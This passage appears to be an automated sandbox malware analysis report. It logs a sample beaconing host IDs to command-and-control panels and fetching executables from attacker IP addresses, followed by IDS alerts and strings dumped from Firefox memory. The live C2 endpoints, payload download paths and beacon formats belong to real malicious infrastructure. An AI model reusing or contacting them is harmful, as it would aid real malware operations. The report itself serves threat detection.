                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013513001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013514001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 32 42 44 33 34 30 35 45 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="hwid"DC2BD3405E6F1350827015------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build"stok------IDBKKKKKFBGDGDHIDBGH--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 80.82.65.70 80.82.65.70
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49859 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49873 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49874 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49879 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49884 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49891 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49899 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49898 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49867 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49905 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49921 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49923 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49924 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49930 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49936 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49943 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49951 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49958 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49960 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49967 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49973 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49969 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49979 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49945 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49994 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50000 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50013 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50033 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50041 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50050 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50065 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50074 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50079 -> 104.21.48.1:443
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4E0C0 recv,recv,recv,recv,0_2_00F4E0C0
                          Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozilla-20&sourceid=Mozilla-search equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/device-migration.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)Thank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/device-migration.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat 